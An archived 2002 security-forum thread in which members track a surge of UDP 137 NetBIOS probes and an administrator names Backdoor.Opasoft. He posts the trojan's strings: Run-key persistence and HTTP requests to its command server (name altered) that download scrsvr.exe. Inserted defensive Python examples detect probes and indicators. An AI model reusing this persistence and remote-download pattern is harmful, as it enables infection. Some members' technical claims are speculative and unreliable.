new trojan known for UDP 137: Backdoor Opasoft

Discussion in 'malware problems & news' started by Jooske, Sep 28, 2002.

Thread Status:
Not open for further replies.
  1. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Hi dear forum fellows, just wondering, as I get a remarkably high amount of UDP 137 knocks, 99% of Korean origin (most of the time originating from their port 1025), since yesterday, but today it's really many; I wonder if something known is going on? ShieldsUp told me I'm stealth but ....

    With this I wonder if more people name their computer
    {not available} for their protection against resolving :)

    subject line changed - Forum Admin
     
  2. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    See this dynamic report page
    http://isc.incidents.org/port_details.html?port=137
     
  3. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    4,098
    Re:Any new trojan known for UDP 137?

    It is possible this is a trojan - or some sort of coordinated attack by some hacking group against various IP ranges (since, as you said, it seems to be coming mostly from Korea...).

    Or it could be a hacker trying out "their" compromised machines to try to find more machines to compromise...who knows. :rolleyes:

    If I find any more information on new trojans, viruses, etc. that use this port, you can be sure I will post it.

    -Javacool
     
  4. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    If you look at the page now you see it has passed 8% of the reports, with over 108,000 records, and this is already 2% more than the big attack on 14 September.
    Found older reports too of exactly this: servers probed on UDP 137 to take over with 1025-1026, shared files, and trying to install a backdoor and destroying stuff.
    I found out that the moment I open the TDS port listen it stops immediately, till I close that and it starts again in a few moments.
    During the day the attacks have moved round the globe with the sun over all the time zones and now it's back in Korea for me.
    Hmm, that port listen doesn't stop the port 80 knocks now.

    As UDP does not have the return signal but TCP has, that's the reason why I think it might not be a bad idea to rename your own computer to {not available} instead of whatever it is. (See the resolve info in VisualZone and you see what I mean.)

    Compromising or compromised already, both are possible; maybe trying to install zombies for a big DoS, maybe the Kazaa taking over or from another p2p service..... all is possible and most people don't wake up, thinking 137 is innocent, but I'm sure it's not in this case.

    Looking forward to your finds, as Google doesn't bring me any recent news anywhere.
     
  5. FanJ

    FanJ Guest

    Re:Any new trojan known for UDP 137?

    Hi Jooske,

    I really get bombarded with those UDP NetBIOS Name scans.

    It's no fun :mad: .........
     
  6. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Finally somebody is waking up; why do you think I started warning many hours ago? Don't know what to do about it, but I'm happy the firewall still seems to stop them.
    Coming unorganised from everywhere now; I think they're trying to DoS the whole internet.
    Still don't see anything useful anywhere on info about what this is about. New Kazaa? It's not peek-a-booty, as that was on 443 if I remember well, so what can it be?
     
  7. controler

    controler Guest

    Re:Any new trojan known for UDP 137?

    here is another site for posted attacks

    http://www.dshield.org/
     
  8. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    From dshield to the reports pages you come on those Storm pages i posted above.

    Would like to know if other people are still getting all those knocks? And if it helped more people with TDS to open the Port Listen on 137? Tried various times, and with that on I only got the normal few port 80 probes, but no 137 anymore.
    Do other people have other ways which are helpful?
    The report displays are not all updated in the plot since 28 September 22:xx GMT, when almost 8% of the attacks were port 137 with over 108,000 records. So it must have grown since.

    Did anybody find more info on what is going on already? Whatever it was, it seems very successful for the attackers.
     
  9. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,491
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Jooske,

    I'm not very knowledgeable in this field, but could it be they have switched to untraceable IPs?
    I've been keeping an eye on my SPF logs since you started this thread and now I've got my first attempts all coming from what looks like home network ranges.

    Regards,

    Pieter
     
  10. controler

    controler Guest

    Re:Any new trojan known for UDP 137?

    Hi all

    Since I am from the old school and still believe things should be kept simple, here is a nicely written article by a member of the GRC forum:

    Deciphering the NETSTAT -AN DOS command


    http://www.geocities.com/merijn_bellekom/new/netstatan.html
     
  11. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
  12. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Not sure, I have them from home users, universities, internet cafes, companies, networks (seeing their computer names/identifications) from all over the planet.
    Not a single one from our ISP this time, so they might have put good filters up.
    Maybe they track especially ZA/ZAPro users :)

    At GRC.com in the security forum there is some discussion about it, but there too no more conclusions than we have here.
    On the dshield reports page it is now 15% of the records today and in the yellow alarm phase; last night it has grown over 200,000 records to over 10% of yesterday's submissions.

    Still thinking of something like Kazaa, but our ISP's security department is not sure yet.
    They were really happy with my find to open the Port Listen in TDS. It's completely illogical in my opinion, as that listens to TCP port packets and this is a UDP port, but it stops the portscans immediately.
    ShieldsUp does not show that port open at all with this now, so no worry!
    Good time to use your panic button page for something informative today :p
    http://home01.wxs.nl/~kleyn080/schudden.html
    Is it still up?
     
  13. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
  14. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,491
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Yeah, it's still up, but I haven't found the time to make improvements. ;)

    I've got a few logs coming from port 1026 as well.

    Regards,

    Pieter
     
  15. Primrose

    Primrose Registered Member

    Joined:
    Sep 21, 2002
    Posts:
    2,743
    Re:Any new trojan known for UDP 137?

    There are currently 4 NEW different Trojans out that take over a machine via Kazaa, infect that machine, use it as a drone, then go out on various ports, i.e. 1025 etc., or go out and infect other machines so they can run a coordinated attack.
     
  16. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    Can you give the names of those trojans please?
    It's exactly the behavior we see, I guess?
    I've seen in the dshield reports the most are share/p2p ports, Kazaa, Gnutella, same as msinit/bymer; whoever did it seems rather successful.
    Are there more ways of closing the attacks than what I do with the port listen up? Not any 137 knock!
     
  17. FanJ

    FanJ Guest

    Re:Any new trojan known for UDP 137?

    To give an idea for about one hour:


    Note:
    I have put xxxx at the last four digits of the IP numbers.
     

    Attached Files:
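
    The attachments above are hourly firewall logs of these probes. As an added example that is not from the thread or its attachments, here is a small detector over constructed log lines (the line format and addresses are invented for the example): it keeps only UDP probes to port 137, counts how many come from the 1025/1026 source ports mentioned earlier, and flags any source that fires a burst within a one-hour window.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the thread); format is an assumption:
# "<date> <time> <proto> <src>:<sport> -> <dst>:<dport> <action>"
SAMPLE_LOG = """\
2002-09-28 22:01:03 UDP 203.0.113.7:1025 -> 192.0.2.10:137 DROP
2002-09-28 22:03:41 UDP 203.0.113.7:1025 -> 192.0.2.10:137 DROP
2002-09-28 22:06:12 UDP 203.0.113.7:1025 -> 192.0.2.10:137 DROP
2002-09-28 22:09:55 UDP 203.0.113.7:1025 -> 192.0.2.10:137 DROP
2002-09-28 22:10:20 TCP 203.0.113.7:3012 -> 192.0.2.10:80 DROP
2002-09-28 22:15:07 UDP 198.51.100.22:1026 -> 192.0.2.10:137 DROP
2002-09-28 20:30:00 UDP 198.51.100.90:1025 -> 192.0.2.10:137 DROP
2002-09-28 22:45:00 UDP 198.51.100.90:1025 -> 192.0.2.10:137 DROP
2002-09-29 00:50:00 UDP 198.51.100.90:1025 -> 192.0.2.10:137 DROP
"""

LINE_RE = re.compile(r"^(\S+ \S+) (TCP|UDP) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\S+):(\d+) (\w+)$")

def parse_lines(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, proto, src, sport, dst, dport, action = m.groups()
        yield {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "proto": proto,
               "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "action": action}

def peak_in_window(times, window):
    """Largest number of events from one source inside any sliding window."""
    times, best, j = sorted(times), 0, 0
    for i, t in enumerate(times):
        while times[j] < t - window:
            j += 1
        best = max(best, i - j + 1)
    return best

def summarize_netbios_probes(text, window=timedelta(hours=1), threshold=3):
    """Count UDP/137 probes, the share from source ports 1025/1026, and flag bursty sources."""
    events = [e for e in parse_lines(text) if e["proto"] == "UDP" and e["dport"] == 137]
    per_src = defaultdict(list)
    for e in events:
        per_src[e["src"]].append(e["ts"])
    scanners = {src: peak_in_window(ts, window) for src, ts in per_src.items()
                if peak_in_window(ts, window) >= threshold}
    return {"total": len(events), "sources": len(per_src),
            "from_1025_1026": sum(e["sport"] in (1025, 1026) for e in events),
            "scanners": scanners, "busiest": Counter(e["src"] for e in events).most_common(1)}

if __name__ == "__main__":
    print(summarize_netbios_probes(SAMPLE_LOG))
```

With the sample, only 203.0.113.7 is flagged: four probes in nine minutes, while 198.51.100.90 sends three probes spread over more than four hours and never exceeds one per window.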

  18. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,491
    Location:
    Netherlands
    Re:Any new trojan known for UDP 137?

    Not that bad, but still.. :mad:
     

    Attached Files:

  19. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    And can you now try in TDS > Networks > TCP Port listen, fill in #137 > Listen, and look once in a while at the results?
    Remembering TCP has its UDP twin most of the time, so this is part of the logic of the result.
    As I'd really like to read if that works for you too to stop the scans on 137.
     
  20. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    18,278
    Location:
    New England
    Re:Any new trojan known for UDP 137?

    It sounds like that TDS option is starting up a listener and opening up the port you specify. If that's what TDS is doing then it's not so much that you've stopped the incoming probes, it's more that you have started absorbing them. Your firewall is not alerting because it sees a program that has permission to listen on that port, so the firewall lets those packets into your system where TDS is reading them.

    It is certainly one way to stop the firewall alerts.

    Question: Do you know what TDS does with the incoming data? Does it write it to some kind of listening log file, where you can then analyze the packets? That would be real useful.

    Here is a simple port listening tool that could be used in a similar fashion I'd imagine:
    http://www.xploiter.com/tambu/tambudummy.shtml
     
  21. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    Re:Any new trojan known for UDP 137?

    We can allow the function to act as a server, so it would be able to communicate; in the other way it is just stopped; other people got nice log files of the 50-byte probe packets, which seemed the normal NetBIOS requests.
    With some other tool I look at the data amount but nothing is received nor sent on those listening ports, with the counter on 0. The absorbing was my first idea too, so let's wait and see what comes next!
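
    The 50-byte probes Jooske mentions are exactly the size of a standard NetBIOS name-service query: a 12-byte header, a 34-byte encoded question name and 4 bytes of type/class. As an added example (not code from the thread or from TDS), the following builds such a packet from constructed values and decodes it, so a listener log of the raw bytes could be read back into the name being asked for.

```python
import struct

NBNS_PORT = 137
QTYPE = {0x0020: "NB (name query)", 0x0021: "NBSTAT (node status)"}

def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """NetBIOS first-level encoding: pad the name to 15 bytes, append the
    suffix byte, then write each nibble as a letter 'A'..'P'. The wildcard
    name '*' is followed by 15 NUL bytes rather than spaces."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().encode("ascii").ljust(15)[:15] + bytes([suffix])
    return bytes(b for byte in raw for b in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))

def decode_name(enc: bytes) -> tuple:
    """Inverse of encode_name for the fixed 32-byte encoded label."""
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("ascii", "replace"), raw[15]

def build_query(txid: int, name: str, qtype: int, suffix: int = 0x00) -> bytes:
    """Constructed NBNS query: header (ID, flags=0, QDCOUNT=1, others 0),
    one question (length 32, encoded label, 0 terminator), QTYPE, QCLASS=IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = bytes([32]) + encode_name(name, suffix) + b"\x00" + struct.pack(">HH", qtype, 1)
    return header + question

def parse_query(pkt: bytes) -> dict:
    """Decode a captured UDP/137 datagram; raise ValueError unless it is a
    well-formed single-question NBNS query (the 50-byte shape)."""
    if len(pkt) < 50:
        raise ValueError(f"too short for an NBNS query: {len(pkt)} bytes")
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1 or pkt[12] != 32 or pkt[45] != 0:
        raise ValueError("not a single-question NBNS query")
    name, suffix = decode_name(pkt[13:45])
    qtype, qclass = struct.unpack(">HH", pkt[46:50])
    return {"txid": txid, "name": name, "suffix": suffix, "qtype": qtype,
            "kind": QTYPE.get(qtype, "unknown"), "wildcard": name == "*",
            "recursion_desired": bool(flags & 0x0100), "length": len(pkt)}

if __name__ == "__main__":
    probe = build_query(0x1234, "*", 0x0021)  # the classic 50-byte node-status probe
    print(len(probe), probe.hex())
    print(parse_query(probe))
```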
     
  22. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,475
    Location:
    The Netherlands
    Re:Any new trojan known for UDP 137?

    Well, the answer is: backdoor.Opasoft - detected by KAV since this very day. Here are some specs:

    RegisterServiceProcess SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Software\Microsoft\Windows\CurrentVersion\Internet Settings ScrSvr
    ScrSvrOld ProxyEnable ProxyServer \ScrSvr.exe ScrSin.dat ScrSout.dat
    scrupd.exe wwx.opasoft.com GET
    http://wwx.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0
    HTTP/1.1
    Host: wwx.opasoft.com

    GET http://wwx.opasoft.com/work/lastver HTTP/1.1
    Host: wwx.opasoft.com

    GET http://wwx.opasoft.com/work/scrsvr.exe HTTP/1.1
    Host: wwx.opasoft.com

    POST http://wwx.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0
    HTTP/1.1
    Host: wwx.opasoft.com

    PLAIN CIPHER1 KEY:
    WINDOWS\scrsvr.exe WINDOWS\win.ini c:\tmp.ini
    c:\windows\scrsvr.exe , windows run

    URLs made useless: "wwx" - Forum Admin

    Moving this thread to the appropriate forum

    regards.

    paul
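
    The strings above name a Run key, a ScrSvr value, scrsvr.exe and win.ini. As an added triage check (not from the thread or from KAV), the following looks for those indicators on a host. It assumes the Run value is named ScrSvr and that the win.ini reference is a [windows] run= or load= line pointing at scrsvr.exe; both are inferences from the string list, not something the post confirms. The live registry and win.ini read is Windows-only, so the checks also take supplied data and can be exercised on constructed input.

```python
import configparser
import os
import sys

# Indicator strings taken from the post above (assumption: ScrSvr is the Run value name).
SUSPECT_EXE = "scrsvr.exe"
SUSPECT_VALUE = "scrsvr"
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

def check_run_values(values: dict) -> list:
    """Flag Run entries named ScrSvr or whose command line launches scrsvr.exe."""
    return [f"Run value {name!r} -> {cmd}" for name, cmd in values.items()
            if name.lower() == SUSPECT_VALUE or SUSPECT_EXE in cmd.lower()]

def check_win_ini(text: str) -> list:
    """Flag a [windows] run= or load= line referencing scrsvr.exe (assumed usage)."""
    cp = configparser.ConfigParser(strict=False, allow_no_value=True, interpolation=None)
    cp.read_string(text)
    hits = []
    if cp.has_section("windows"):
        for opt in ("run", "load"):
            val = cp.get("windows", opt, fallback="") or ""
            if SUSPECT_EXE in val.lower():
                hits.append(f"win.ini [windows] {opt}={val}")
    return hits

def read_live_run_values() -> dict:
    """Windows-only: collect HKLM and HKCU Run values via winreg."""
    import winreg
    out = {}
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, RUN_KEY) as key:
                i = 0
                while True:
                    try:
                        name, val, _ = winreg.EnumValue(key, i)
                    except OSError:
                        break
                    out[name] = str(val)
                    i += 1
        except OSError:
            pass  # hive or key not readable; nothing to check there
    return out

if __name__ == "__main__" and sys.platform == "win32":
    hits = check_run_values(read_live_run_values())
    ini = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "win.ini")
    if os.path.exists(ini):
        with open(ini, encoding="utf-8", errors="replace") as fh:
            hits += check_win_ini(fh.read())
    print("\n".join(hits) or "no Opasoft indicators found")
```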
     
  23. jvmorris

    jvmorris Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    618
    Paul,

    Yep, just came over to check out Jooske's thread. There are now two threads running on this at DSLR Security Forum. Look for postings by psloss, Name Game, and NetWatchMan.
     
  24. Jooske

    Jooske Registered Member

    Joined:
    Feb 12, 2002
    Posts:
    9,713
    Location:
    Netherlands, EU near the sea
    wwx.opasoft.com resolves so nicely to 127.0.0.1!
    Would like more info, to know possible threats and damage. Imagine if my opening the TCP Port Listen all the time (which really stopped the knocking) caused more than I would be aware of at this moment? Don't think so, but you never know :) till we're all sure.
    But as there are several trojans with the same kind of behavior, could there be more..? Thinking of the people mentioning combinations with 443 and some on 445.
     
  25. FanJ

    FanJ Guest
